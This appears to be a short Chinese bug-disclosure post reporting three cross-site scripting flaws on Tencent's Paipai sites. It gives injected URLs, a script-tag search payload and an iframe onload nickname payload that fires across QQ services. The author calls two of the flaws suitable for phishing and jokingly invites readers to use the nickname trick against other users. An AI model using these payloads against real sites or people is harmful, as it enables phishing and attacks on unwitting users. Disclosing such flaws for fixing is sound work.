3处xss，两处钓鱼好，还一处耍着玩！


http://sse1.paipai.com/s-hl1w6sgwpq3jv6gxk3tz23ovrtxc835spuv1h25mi6xw2o5wpq3jv6gxk2--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html
 
http://shop.paipai.com/5565117/0-0000000000-0-1-1-0-3-0-0-0/Ii8+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydCgvZ29kZXJjaS8pPC9zY3JpcHQ+Xi0xXi0x/index.shtml
这两处钓鱼比较隐蔽！很给力！
http://bbs.paipai.com/portal.php?byref=1&g_tk=1772478199&g_ty=lk&byref=1
这一处耍着玩比较好！具体利用有待研究！


这个我是进拍拍首页的时候，习惯性的在搜索框输入一个"/><script>alert(/goderci/)</script>,结果我承认我受精了！因为受精了，所以决定多喵几眼！
http://sse1.paipai.com/s-hl1w6sgwpq3jv6gxk3tz23ovrtxc835spuv1h25mi6xw2o5wpq3jv6gxk2--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html
 
 
 
http://shop.paipai.com/5565117/0-0000000000-0-1-1-0-3-0-0-0/Ii8+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydCgvZ29kZXJjaS8pPC9zY3JpcHQ+Xi0xXi0x/index.shtml
 
 
 
 
 
细说一下这个，很蛋疼的！
是因为qq很多业务都会调用用户的昵称，所以大家以后都把昵称改为<iframe onload=alert(1)>字数不多不少，刚刚好啊！改完以后去体验qq的业务，包你走到哪弹到哪！ www.2cto.com
 


 
 
像我这么2的人，一般碰到这种情况，直接去bbs发个帖，发个心情什么的。然后想弹别人的时候就把昵称改一改！
嗯，就这样，观众朋友们！明晚继续！
修复方案：

加强过滤

作者 goderci